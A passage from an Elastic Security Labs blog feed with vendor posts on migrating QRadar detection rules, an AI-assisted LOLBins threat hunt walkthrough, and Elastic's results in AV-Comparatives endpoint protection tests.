            <description><![CDATA[Today, we are excited to announce a major expansion to our Automatic Migration feature that changes that narrative. In Elastic Security 9.3, we are introducing Automatic Migration support for QRadar detection rules (now in Tech Preview), joining our existing Splunk translation capabilities to further expedite your journey to Elastic Security. Let's take a closer look at what's supported.]]></description>
            <content:encoded><![CDATA[<h1>From QRadar to Elastic: Automate Your Detection Rule Migration</h1>
<p>Migrating to a new SIEM is often viewed as a daunting task. The sheer volume of legacy detection rules, <a href="https://www.elastic.co/blog/automatic-migration-for-dashboards">dashboards</a>, and custom configurations can keep security teams locked into aging infrastructure simply because the cost of moving — measured in manual effort and time — is too high.</p>
<p>Today, we are excited to announce a major expansion to our Automatic Migration feature that changes that narrative. In Elastic Security 9.3, we are introducing Automatic Migration support for QRadar detection rules (now in Tech Preview), joining our existing Splunk translation capabilities to further expedite your journey to Elastic Security. Let's take a closer look at what's supported.</p>
<h2>Why SIEM Migration is Changing</h2>
<p>Traditionally, organizations had to manually rewrite every rule when switching platforms. This created a significant bottleneck where security coverage was either delayed or lost during the transition. With the latest updates to Automatic Migration, MSSPs and large organizations running multiple SIEMs can now translate both Splunk and QRadar rules into Elastic-native logic automatically.</p>
<h2>What’s Supported for Automatic Migration for QRadar</h2>
<p>The same <a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">mapping and translation</a> is applied as prior rule types but now with support for XML exported QRadar rules. The following rule types are supported:</p>
<ul>
<li>Event - focus on log and event data.</li>
<li>Flow - typically related to network detection scenarios.</li>
<li>Common - a combination of event and flow rules</li>
</ul>
<p>We aren't just moving text; we are preserving the intelligence of your security operations. Reference sets are considered as part of the translation logic. We automatically put this information into lookup indexes where applicable. For more information on ES|QL lookup join syntax check out our <a href="https://www.elastic.co/docs/reference/query-languages/esql/esql-lookup-join">docs</a>. MITRE mappings are also preserved,so that upon rule install this is preserved in the migrated rule in elastic. Behind the scenes we take into account all building block rules as well. These building blocks help to contribute to the translation logic as seen in the summary tab for individual rules.</p>
<h2>Streamlining the onboarding process</h2>
<p>A common &quot;chicken and egg&quot; problem in SIEM migrations is whether to move data or rules first. Our framework provides flexibility for both:</p>
<ol>
<li>Rule-First Insight: You can translate rules before onboarding data. Elastic will identify which integrations are required for those rules to work, allowing you to prioritize your data onboarding.</li>
<li>Data-First Traditionalism: If you prefer, you can onboard your log sources first and then migrate the rules to match.</li>
<li>Custom Data: For unique sources, use <a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-import">Automatic Import</a> to ingest custom data in minutes.</li>
</ol>
<p>By identifying exactly which integrations are needed before moving a single log, teams can build a precise, risk-aware roadmap for their migration project. This transparency eliminates the guesswork and helps ensure that critical visibility gaps are addressed long before you fully decommission your legacy environment.</p>
<h2>Getting started with Automatic Migration for Detection Rules</h2>
<p>To get started with Automatic Migration for Detection Rules, after deciding on migrating your detection rules and data, follow these three simple steps:</p>
<ol>
<li>Navigate to Elastic Security’s “Get started” page and configure your AI Provider.</li>
</ol>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image1.png" alt="" /></p>
<ol start="2">
<li>Select the drop down on the top right for QRadar. Let Elastic guide you through exporting your rules from QRadar and uploading them into Elastic Security. Elastic handles the finer details by scanning for reference sets, MITRE mappings, and then prompts you to upload them when found. MITRE mappings can only be included at the time of the initial translation so make sure to include them if you have this information.</li>
</ol>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image3.png" alt="" /></p>
<ol start="3">
<li>Once the dashboards are uploaded, you can view their status.</li>
</ol>
<ul>
<li>Installed: Already added to Elastic SIEM. Click View to manage and enable it.</li>
<li>Translated: Ready to install. This rule was mapped to an Elastic-authored rule, or translated by Automatic Import. Click Install to install it.</li>
<li>Partially translated: Part of the query could not be translated. You may need to specify an index pattern for the rule query, upload missing files, or fix broken rule syntax.</li>
<li>Not translated: None of the original query could be translated.</li>
<li>Failed: Translation failed. Refer to the error for details.</li>
</ul>
<p>For more information, refer to the <a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-migration">technical documentation</a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/image2.png" alt="" /></p>
<ol start="4">
<li>After clicking View Rules you will have the ability to edit and install rules.</li>
</ol>
<h2><strong>How Elastic’s AI features aid SOC teams</strong></h2>
<p>Elastic Security brings generative AI into the SOC with <a href="https://www.elastic.co/docs/solutions/search/rag">retrieval augmented generation (RAG)</a> and open agentic frameworks. Automatic Migration joins the lineup of Elastic Security’s powerful AI features helping SOC teams strengthen defenses across the IT environment:</p>
<ul>
<li><a href="https://www.elastic.co/docs/solutions/security/get-started/automatic-migration">Automatic Migration for Detection Rules</a> complements Elastic’s deep library of prebuilt rules to broaden detection use case coverage.</li>
<li><a href="https://www.elastic.co/blog/automatic-import-ai-data-integration-builder">Automatic Import</a> extends visibility <em>and powers detection rules</em> by onboarding custom data sources in minutes.</li>
<li><a href="https://www.elastic.co/security-labs/ai-driven-security-analytics">Attack Discovery</a> distills the alerts generated by detection rules to pinpoint advancing threats and suggest next steps.</li>
<li><a href="https://www.elastic.co/blog/introducing-elastic-ai-assistant">Elastic AI Assistant</a> guides analysts through investigation and response using natural language.</li>
</ul>
<p>Elastic’s Next Gen SIEM and XDR solution helps analysts detect earlier and respond faster.</p>
<h2>Migrate to Elastic Security today</h2>
<p>The days of being stuck with a legacy SIEM are over. Whether you are migrating from Splunk or QRadar, Elastic is here to ensure your transition is fast, accurate, and powerful. Interested in testing Elastic Security first? <a href="https://www.elastic.co/cloud/cloud-trial-overview">Try it free</a>, or <a href="https://www.elastic.co/splunk-interest?elektra=organic&amp;storm=CLP&amp;rogue=splunkobs-gic">get in touch</a>.</p>
<p>Have feedback? Tell us what you think in the <a href="https://ela.st/slack">Elastic Community Slack channel</a> or on the <a href="https://discuss.elastic.co/c/security/83">Elastic Security forum</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/from-qradar-to-elastic/Security Labs Images 10.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[From Hypothesis to Action: Proactive Threat Hunting with Elastic Security]]></title>
            <link>https://www.elastic.co/security-labs/proactive-threat-hunting-with-elastic-security</link>
            <guid>proactive-threat-hunting-with-elastic-security</guid>
            <pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security is designed to enable hypothesis-driven threat hunting at speed and scale. By unifying security telemetry and enabling analytics across clusters, threat hunters can ask complex questions across all their data, correlate signals, and validate hypotheses quickly without manual data stitching.]]></description>
            <content:encoded><![CDATA[<p>When a new threat actor technique emerges — whether from a research blog, an intelligence feed, or breaking news — every threat hunter instinctively shifts into hypothesis mode. Could this be happening in my environment? Are early signals hiding in the noise?</p>
<p>Take the recent TOLLBOOTH research as an example. The moment Elastic Security Labs <a href="https://www.elastic.co/security-labs/tollbooth">published the attack chain</a>, an analyst might begin forming hypotheses based on specific techniques described, such as:</p>
<ul>
<li><em>Have historically frozen or archived IIS server logs shown any anomalies when re-examined with full telemetry?</em></li>
<li><em>Are there signs of credential dumping or privilege escalation attempts on any IIS servers?</em></li>
</ul>
<p>This is the essence of hypothesis-driven hunting; start with a developing threat, and rapidly ask targeted questions. It’s one of the most effective ways to get ahead of emerging attacks, but it demands broad visibility and tools that can keep up with your curiosity.</p>
<p>The reality for many SOC teams, however, falls short. They face data silos, limited search capabilities, and the fatigue of manual correlation.</p>
<p>Elastic Security is designed to remove these barriers by enabling <strong>hypothesis-driven threat hunting at speed and scale</strong>. By unifying security telemetry and enabling analytics across clusters, threat hunters can ask complex questions across all their data, correlate signals, and validate hypotheses quickly without manual data stitching.</p>
<p>This capability is delivered through a set of foundational building blocks that work together:</p>
<ul>
<li>
<p><strong>Agentic workflows</strong> triage alerts, while a <strong>knowledge-grounded AI Assistant</strong> generates validated ES|QL queries, drives remediation, and recommends next steps.</p>
</li>
<li>
<p><strong>Elastic Security Labs</strong> to bring continuously updated threat research and adversary insights directly into detections and investigations.</p>
</li>
<li>
<p><strong>Detection rules</strong> that provide out-of-the-box coverage aligned to real-world attack techniques and hunting scenarios.</p>
</li>
<li>
<p><strong>Entity analytics</strong> to correlate users, hosts, and services, assign risk scores, and surface anomalies to enrich every investigation.</p>
</li>
<li>
<p><strong>Machine learning and anomaly detection</strong> to surface deviations from normal behavior and expose unknown or emerging threats.</p>
</li>
<li>
<p><strong>ES|QL, visualizations, and cross-cluster search</strong> to enable fast, expressive querying, intuitive analysis, and seamless hunting across distributed environments without blind spots.</p>
</li>
</ul>
<p>Together, these building blocks give security teams the <strong>speed, scale, and analytical depth</strong> needed to move from reactive investigation to confident, proactive threat hunting—testing hypotheses across all of their data within a single, unified Elastic Security platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image5.png" alt="" /></p>
<h2>Into the woods: Navigating a real-world LOLBins hunt</h2>
<p>This section shows how a threat hunt plays out in practice, moving from an empty search bar to a confirmed and contained threat through a real-world scenario focused on Living Off the Land Binaries (LOLBins).</p>
<h3>Build your hypothesis with a RAG-powered AI Assistant</h3>
<p>Your investigation can begin even before writing a single query. You can use Elastic’s retrieval-augmented generation (RAG)–powered AI Assistant to pull in trusted <a href="https://www.elastic.co/docs/solutions/security/ai/ai-assistant-knowledge-base">knowledge sources</a>, such as Elastic Security Labs research, and build the foundation of your hypothesis. You can add any trusted sources as knowledge to ensure the Assistant reflects the data you rely on.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image1.png" alt="Elastic AI Assistant knowledge base entries" /></p>
<p>If you don’t have a specific target yet, you can ask the Assistant,</p>
<p><em>“Based on current trends, what hypothesis should I start my hunt with today?”</em> The Assistant scans the configured knowledge base, which provides relevant context and directly generates a primary hypothesis along with supporting reasons and evidence. In this scenario, Elastic Security Labs content has been added to the knowledge base to supply the context.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image9.png" alt="" /></p>
<h3>Sit back while AI Assistant creates your tailored threat hunting query</h3>
<p>Once you accept the LOLBin hypothesis, the AI Assistant generates a precise ES|QL threat hunting query tailored to your environment. Instead of writing complex syntax from scratch, you receive a targeted search designed to surface the specific suspicious behaviors.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image8.png" alt="Elastic AI Assistant-generated ES|QL query to detect Office/Server spawned LOLBins with suspicious patterns" /></p>
<p>To ensure queries are ready to run, the Elastic AI Assistant uses an agentic workflow to generate bespoke ES|QL queries from human-supplied use cases. It draws on your Elastic cluster data to craft accurate, ready-to-run responses and performs automatic validation before returning the final query. This background validation removes the need for manual troubleshooting, delivering a verified, ready-to-use query that can be pulled directly into your investigation timeline from the AI Assistant.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image7.png" alt="Elastic Security Timeline with ES|QL pulled over from the AI-assistant" /></p>
<p>Alternatively, you can link a GitHub repository of Elastic’s <a href="https://github.com/elastic/detection-rules/tree/main/hunting">threat hunting queries</a> to the Assistant’s knowledge base to use existing queries as a baseline for your next steps.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image13.png" alt="Threat hunt queries section within Elastic’s pre-built detection rules GitHub repository" /></p>
<h3>Hunt Threats Across Your Entire Environment with ES|QL</h3>
<p>If you manage a global environment and need to determine whether this activity is occurring in other clusters, you can expand your hypothesis by asking the AI Assistant to adapt the query for a Cross-Cluster Search (CCS). This enables you to search across multiple clusters in your environment—including frozen and long-term data—without disrupting your investigative workflow.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image11.png" alt="Updated ES|QL query using cross-cluster search to show Office/Server spawned LOLBins with suspicious patterns in both local and remote clusters" /></p>
<p>Seamlessly transition from the AI Assistant to the timeline view and run the query. This targeted search uncovers a critical finding: an instance of <em>rundll32.exe</em> executing on a Windows server with hostname <em>elastic-defend-endpoint</em> under the <em>gbadmin</em> user account*.*</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image6.png" alt="LOLBin Investigation Timeline results" /></p>
<h3>Add context with analytics and visualizations</h3>
<p>Finding a hit is only step one; now, you must determine if this is an admin performing maintenance or an actual attack. Validating your ideas requires deep analytics across hosts and users. By drilling down into the affected host, you land in the Entity Details.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image10.png" alt="Host Entity flyout" /></p>
<p>Here, you’re not just seeing a hostname. You’re seeing a consolidated view of the host’s risk score, the specific alerts contributing to that score, and the asset’s criticality—all in one place. By bringing together detection signals, behavioral anomalies, and asset importance, Elastic’s entity risk scoring helps analysts quickly understand why an asset is risky, how urgent the threat is, and where to focus first. This unified context reduces investigation time, minimizes guesswork, and enables confident prioritization in high-volume environments.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image14.png" alt="Entity details, risk score, and associated alerts for the affected host" /></p>
<h3>Confirm the anomaly with machine learning</h3>
<p>When you examine the risk score, the supporting evidence is displayed alongside it. You can see the specific alerts contributing to the elevated risk score, including a mix of medium-severity alerts and a Machine Learning (ML) alert such as <em><strong>“Unusual Windows Path Activity”</strong></em>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image16.png" alt="Machine learning anomaly alert" /></p>
<p>Because ML is uniquely suited to detecting subtle deviations that static rules often miss, seeing an ML alert contributing to the risk score helps validate that this activity isn’t just noise—it points to a meaningful behavioral anomaly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image2.png" alt="‘Unusual Windows Path Activity’ alert flyout" /></p>
<p>The event details immediately visualize the process lineage, revealing the critical evidence right in the panel. These insights transform your hypothesis from plausible to provable.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image12.png" alt="Visual event analyzer with rundll32.exe flyout" /></p>
<h3>Take Action: From Insight to Response</h3>
<p>After validating your hypothesis by uncovering suspicious activity, the immediate next step is response. Elastic Security lets responders act directly from their investigations without switching platforms.</p>
<p>Once a compromised host is confirmed, you can take action from the console by isolating the host to prevent lateral movement or terminating the malicious process tree uncovered in your <strong>LOLBIN hunt</strong>. This seamless transition from investigation to response enables rapid containment using the same tools and context.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image4.png" alt="Response console for isolated host, elastic-defend-endpoint" /></p>
<h3>Operationalize Queries and Automate Hunting</h3>
<p>To automate future hunts and eliminate manual verification of recurring patterns, you can directly import a query into an operational detection rule, or create a rule for specific behaviors, anomalies, or new term values appearing for the first time, and convert it into a fully operational detection rule with a single click.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image15.png" alt="Detection rule creation with ES|QL in Elastic Security" /></p>
<p>In enterprise environments, a LOLBin hunt can quickly generate a high volume of alerts. This is where agentic <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery"><strong>Attack Discovery</strong></a> makes a big difference. Its primary purpose is to help you triage efficiently by automatically correlating signals and highlighting the activity that requires immediate attention.</p>
<p>You can also group and tag hunting-related alerts and run Attack Discovery specifically on those sets to uncover meaningful patterns. This flexibility makes Attack Discovery valuable not only for automated alert triage, but also for advanced, hypothesis-driven threat hunting workflows.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image3.png" alt="Running Attack Discovery on a curated group of LOLBin hunting alerts" /></p>
<h3>Bonus: Automate with Elastic Agent Builder</h3>
<p>Imagine building a <strong>LOLBin Hunter custom agent</strong>—purpose-built to hunt for LOLBin activity across your security data. Using <a href="https://www.elastic.co/docs/solutions/search/agent-builder/get-started"><strong>Elastic Agent Builder</strong></a>, you can create this agent powered by an LLM and equipped with tools such as the ES|QL queries used in your manual workflow.</p>
<p>Once configured, you can interact with your security data using natural language, and the agent will reason through your request, select the most relevant tools, and take action. For example, you could ask: <em>“Show me LOLBin activity that triggered machine learning anomalies and summarize the affected hosts and their risk scores.”</em></p>
<h3>Stay ahead of emerging attacks with Elastic Security</h3>
<p>Hypothesis-driven threat hunting is critical for staying ahead of modern attacks, but it can be complex and time-consuming without the right tools. Elastic Security combines AI-assisted investigation, ES|QL search, contextual analytics, machine learning, and integrated response to make every stage simpler and faster.</p>
<p>From the moment a new threat emerges to the point of actionable response, Elastic empowers analysts to uncover hidden signals, validate their hypotheses, and act decisively—turning raw data into intelligence and intelligence into action.</p>
<p>Interested in learning more about Elastic Security? <a href="https://www.elastic.co/events">Browse our webinars, events, and more</a> or <a href="https://www.elastic.co/start">get started with your free trial</a> today.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/proactive-threat-hunting-with-elastic-security/image0.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Elastic excels in AV-Comparatives EPR Test 2025: A closer look]]></title>
            <link>https://www.elastic.co/security-labs/elastic-av-comparatives-epr-test-2025</link>
            <guid>elastic-av-comparatives-epr-test-2025</guid>
            <pubDate>Mon, 22 Sep 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic shares results of the 2025 AV Comparatives EPR test]]></description>
            <content:encoded><![CDATA[<p>In a threat landscape defined by sophisticated, multistage attacks, enterprises demand endpoint security solutions that not only detect threats but also actively prevent them and enable rapid responses when the unexpected occurs. Elastic Security demonstrated exceptional performance in a recent AV-Comparatives evaluation, achieving a remarkable 99.3% detection rate. This impressive and consistent figure across both Active Response and Passive Response methods from the <a href="https://www.av-comparatives.org/tests/endpoint-prevention-response-epr-test-2025/?utm_source=blog&amp;utm_medium=referral&amp;utm_campaign=av-comparatives-epr-test-2025-gc">Endpoint Prevention and Response (EPR) Test</a> highlights the versatility and robustness of Elastic Security capabilities, showing strong protection across different attack vectors.</p>
<h2><strong>What is the EPR Test?</strong></h2>
<p>AV-Comparatives’ EPR Test is one of the most rigorous evaluations in the industry. It simulates complex, realistic attack scenarios that traverse the full kill chain, including:</p>
<ul>
<li>Endpoint compromise and foothold (e.g.,initial access, execution, and persistence)</li>
<li>Internal propagation (e.g., privilege escalation, lateral movement, and credential theft)</li>
<li>Asset breach (e.g., exfiltration, command and control, and impact)</li>
</ul>
<p>The EPR Test replicates APT-like multistage attacks rather than relying on synthetic malware samples. It evaluates <a href="https://www.elastic.co/blog/elastic-extended-security">endpoint prevention and response solutions</a> against the MITRE ATT&amp;CK® framework, covering:</p>
<p><strong>Phase 1: Endpoint Compromise and Foothold</strong></p>
<ul>
<li><strong>Initial Access, Execution, and Persistence</strong>
<ul>
<li>Replication through removable media</li>
<li>Malicious documents/scripts</li>
<li>Registry modifications</li>
</ul>
</li>
</ul>
<p><strong>Phase 2: Internal Propagation</strong></p>
<ul>
<li><strong>Privilege Escalation, Lateral Movement, and Credential Access</strong>
<ul>
<li>Scheduled tasks/launch daemons</li>
<li>Unsecure credentials</li>
<li>Exploitation of remote services</li>
</ul>
</li>
</ul>
<p><strong>Phase 3: Asset Breach</strong></p>
<ul>
<li><strong>Collection, Command and Control, and Exfiltration</strong>
<ul>
<li>Data encoding</li>
<li>Input and screen capture</li>
<li>Application layer protocol</li>
</ul>
</li>
</ul>
<p>All participants are scored on two vectors:</p>
<ul>
<li><strong>Active Response:</strong> The product blocks the attack automatically.</li>
<li><strong>Passive Response:</strong> The product detects and alerts on the activity, providing actionable data for analysts.</li>
</ul>
<p>Additionally, the test quantifies:</p>
<ul>
<li><strong>Operational Accuracy Costs</strong> (false positives, admin overhead)</li>
<li><strong>Workflow Delay Costs</strong> (productivity impact)</li>
<li><strong>Total Cost of Ownership (TCO)</strong> for a <strong>5,000-endpoint/5-year deployment</strong></li>
</ul>
<p>**<img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image4.png" alt="AV-Comparatives Enterprise CyberRisk Quadrant™" /></p>
<h2><strong>AV-Comparatives’ Certified EPR Product Award</strong></h2>
<p>In order to get a meaningful comparison between all participants, AV-Comparatives developed the Enterprise CyberRisk Quadrant, which takes into consideration all aspects described above. Elastic Security achieved <em>Certified</em> status, meaning a high level of performance in all key areas, confirming the product meets stringent evaluation standards as stated by Andreas Clementi, CEO and founder of AV-Comparatives:<br />
Elastic achieved strong results in AV-Comparatives’ 2025 Endpoint Prevention and Response Test. The product demonstrated consistent performance across both Active and Passive Response methods, highlighting its ability to provide reliable protection against a broad range of attack vectors.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image1.png" alt="av comparative certified EPR 2025 illustration" /></p>
<h2><strong>How Elastic Security performed on the test</strong></h2>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image3.png" alt="" /></p>
<table>
<thead>
<tr>
<th align="left">Metric</th>
<th align="left">Elastic Security results</th>
<th align="left">Interpretation</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Active Response (Prevention)</td>
<td align="left">99.3%</td>
<td align="left">Automated blocking effective across most stages of attack chains</td>
</tr>
<tr>
<td align="left">Passive Response (Detection)</td>
<td align="left">99.3%</td>
<td align="left">Alerts enriched with MITRE ATT&amp;CK mappings, aiding triage and forensic workflows</td>
</tr>
<tr>
<td align="left">Operational Accuracy Cost</td>
<td align="left">Low</td>
<td align="left">Minimal impact due to detection tuning</td>
</tr>
<tr>
<td align="left">Workflow Delay Cost</td>
<td align="left">None</td>
<td align="left">No user workflow disruption</td>
</tr>
</tbody>
</table>
<h2><strong>Why these results matter</strong></h2>
<p><strong>1. Prevention is front and center:</strong><br />
A 99.3% active response rate means Elastic Security was able to stop threats <em>before</em> they could run wild in almost all test cases. This includes interrupting attacks in early phases like execution, persistence, or initial foothold — highly valuable since earlier detection often means lower damage.</p>
<p><strong>2. Low noise, minimal disruption:</strong><br />
False positives (mistakenly flagged benign behavior) and workflow delays are often silent risks; they may not make headlines, but they erode confidence, reduce productivity, and increase costs. Elastic Security’s low operational accuracy cost and zero workflow delay in this test show that strong security doesn’t need to come at the expense of usability.</p>
<p><strong>3. Balanced total cost of ownership (TCO):</strong><br />
The test factors in not just purchase and licensing costs, but also the cost of responding to incidents, staffing, false positives, and potential breach fallout over time. Elastic Security’s strong showing suggests that its solution offers good value in the long term.</p>
<p><strong>4. Holistic protection:</strong><br />
Because the test spans multiple stages of an attack, it rewards vendors who do more than just detect malware signatures. Elastic Security’s performance across initial compromise, propagation, and asset breach phases indicates depth — protection at different layers, good detection capabilities, and the ability to give admins useful data for remediation.</p>
<h2><strong>Conclusions</strong></h2>
<p>Elastic Security’s results in the AV-Comparatives EPR Test 2025 reaffirm its role as a leading endpoint prevention, detection, and response solution. With near-perfect prevention rates, minimal false positives, no workflow delays, and favorable total cost projections, it demonstrates that enterprise security need not force a trade-off between robust protection and operational efficiency.</p>
<h2><strong>One more resource before you go</strong></h2>
<p>Elastic Security isn’t just getting noticed in the analyst community. Cybersecurity practitioners like John Hammond, who recently took <a href="https://youtu.be/tw-NNqzgohk">a hands-on look at Elastic Security</a> are taking notice, too. If you’re interested in just the key highlights from the interview, we summarize them all in <a href="https://www.elastic.co/blog/raw-data-real-time-defense-john-hammond"><em>From raw data to real-time defense: A conversation with John Hammond</em></a>.</p>
<h2><strong>Get started with Elastic Security</strong></h2>
<p>Join the growing number of businesses that trust Elastic Security to protect their organization against attacks. Experience the peace of mind that comes with knowing that your endpoints <em>and organization as a whole</em> are secure against the latest threats. Start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>, and discover the difference that our protection can make. Visit <a href="https://www.elastic.co/security">elastic.co/security</a> to learn more.<br />
<em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-av-comparatives-epr-test-2025/image2.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security scores 100% in AV-Comparatives Business Security Test]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-av-comparatives-business-security-test-2025</link>
            <guid>elastic-security-av-comparatives-business-security-test-2025</guid>
            <pubDate>Mon, 09 Jun 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security nailed it with a perfect score of 100% in the most recent AV-Comparatives Business Security Test.]]></description>
            <content:encoded><![CDATA[<p>We’re thrilled to share that Elastic Security achieved a score of 100% in the recent <a href="https://www.av-comparatives.org/tests/business-security-test-march-april-2025-factsheet/">AV-Comparatives Business Security Test</a>.</p>
<h2>Why the AV-Comparatives Business Security Test matters</h2>
<p>AV-Comparatives is a highly respected organization that conducts rigorous, independent testing specifically for business endpoint security solutions. Unlike consumer antivirus tests, AV-Comparatives evaluations go beyond basic malware detection. The Real-World Protection Test simulates real-world attack scenarios, including malicious websites, in a multipronged approach that evaluates a product’s ability to safeguard businesses from contemporary threats. Earning top honors in AV-Comparatives' Business Security Test signifies a solution's effectiveness in protecting organizations.</p>
<p>The test simulates 220 distinct and complex attack scenarios that replicate the tactics and techniques of contemporary threat actors. The Malware Protection Test assesses a security product’s ability to protect a system against infection by malicious files before, during, or after execution. The evaluation utilized a substantial dataset of 1,018 unique and recently identified malware samples, representing the current threat landscape.</p>
<p>Elastic Security earned perfect scores in both critical categories, demonstrating its robust capabilities to accurately identify and prevent a wide spectrum of sophisticated threats, including both targeted attacks and prevalent malware.</p>
<h2>Highlights from Elastic Security’s performance</h2>
<p><strong>Ranked first of the tested products:</strong> The following business products were tested under Microsoft Windows 11 64-bit:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image1.png" alt="ranked first tested products" /></p>
<p><strong>Real-World Protection Test:</strong> Elastic Security excelled in the Real-World Protection Test, achieving 100% coverage and demonstrating exceptional defense against current cyber attacks. This demonstrates how Elastic gives your business the necessary protection to effectively combat the newest threats, reducing the likelihood of data breaches and operational interruptions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image4.png" alt="real world protection test" /></p>
<p><strong>100% protection in Malware Protection Test:</strong> Elastic Security was the sole participant among 17 vendors to achieve a perfect 100% score in both the Real-World Protection Test and the Malware Protection Test. Our advanced threat detection engine is exceptionally effective at identifying and mitigating malware, proactively combating the increasingly sophisticated malware environment. This perfect score across both critical evaluation criteria highlights not only the efficacy of Elastic Security’s solutions in practical, real-world scenarios but also its comprehensive capabilities in identifying and neutralizing a broad spectrum of malicious software.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-av-comparatives-business-security-test-2025/image2.png" alt="malware protection test" /></p>
<p>Our <a href="https://www.elastic.co/blog/elastic-av-comparatives-business-security-test">consistently excellent results</a> demonstrate our ongoing commitment to delivering dependable protection for businesses of all scales. Elastic Security is a proven solution for safeguarding your organization's data against threats.</p>
<h2>Performance is key to security</h2>
<p>Elastic Security recognizes that effective cybersecurity requires more than just identifying and stopping malicious activity. Advanced cybersecurity demands seamless integration with daily operations for sophisticated security and business efficiency. Comprehensive security capabilities, such as advanced threat detection, proactive ransomware defense, and sophisticated malware analysis, form the bedrock of a strong security posture. However, their true value is diminished if they lead to system performance degradation. Slow, resource-intensive security solutions can frustrate users, impede productivity, and ultimately undermine the very security they aim to provide.</p>
<p>At Elastic Security, performance is not a secondary consideration but a fundamental pillar of our security philosophy and product design. We are committed to delivering world-class security without the performance overhead that can disrupt workflows. Our engineering efforts focus on optimizing every aspect of our platform to minimize CPU and memory consumption.</p>
<h2><strong>EDR stops at the endpoint, XDR doesn’t</strong></h2>
<p>Todayʼs threat landscape is complex and dynamic, with attacks originating from various sources and targeting diverse environments. By correlating information from endpoints, networks, cloud workloads, and more, extended detection and response (XDR) offers a holistic view of the security posture, protecting against increasingly complex threats. The shift from endpoint detection and response (EDR) to XDR is a critical evolution in security operations, offering more robust, efficient, and effective defense mechanisms.</p>
<p><a href="https://www.elastic.co/security/xdr">XDR security from Elastic</a> is designed to protect data across the entire organization — regardless of where it resides. Elastic Security helps organizations improve detection rates, reduce response times, and mitigate overall risk by unifying data types and providing limitless ingestion, analysis, and protection.</p>
<ul>
<li><strong>Extended visibility:</strong> Elastic provides a unified view of your security landscape, encompassing endpoints, networks, and cloud environments. This comprehensive perspective empowers analysts to see the big picture and connect the dots between potential threats. With hundreds of integrations and the AI-driven Automatic Import feature at the ready, your team can seamlessly onboard all types of data from various sources, expanding your visibility across the organization.</li>
<li><strong>XDR detection capabilities:</strong> Elastic Securityʼs AI-driven security analytics correlates data across all sources to uncover sophisticated threats that often evade detection by individual security solutions. Our vast library, with hundreds of prebuilt rules mapped to the MITRE ATT&amp;CK® matrix, combined with proprietary research and detection content from Elastic Security Labs, helps you separate the signal from the noise so you can focus on actual threats. Elastic Security also provides more than 75 machine learning detection rules to automatically detect anomalies across numerous security domains like suspicious user or host activity.</li>
<li><strong>Native and third-party responses:</strong> Analysts often face an overwhelming volume of alerts, making it challenging to focus on legitimate threats. To address this, Elastic security offers both native and third-party response actions to stop attackers in their tracks.</li>
</ul>
<p>We believe XDR should be accessible to every organization, regardless of budget constraints. Thatʼs why our XDR solution is included without any hidden costs or “optional extras.” Our comprehensive visibility goes beyond endpoint telemetry, eliminating the need for additional licenses to unlock full XDR capabilities — all included in the Elastic Security solution. With no per-host or per-agent charges, you have the flexibility to provide coverage where and when you need it.</p>
<p><strong>Read more:</strong> <a href="https://www.elastic.co/blog/elastic-extended-security">You thought Elastic only did SIEM? Think again!</a></p>
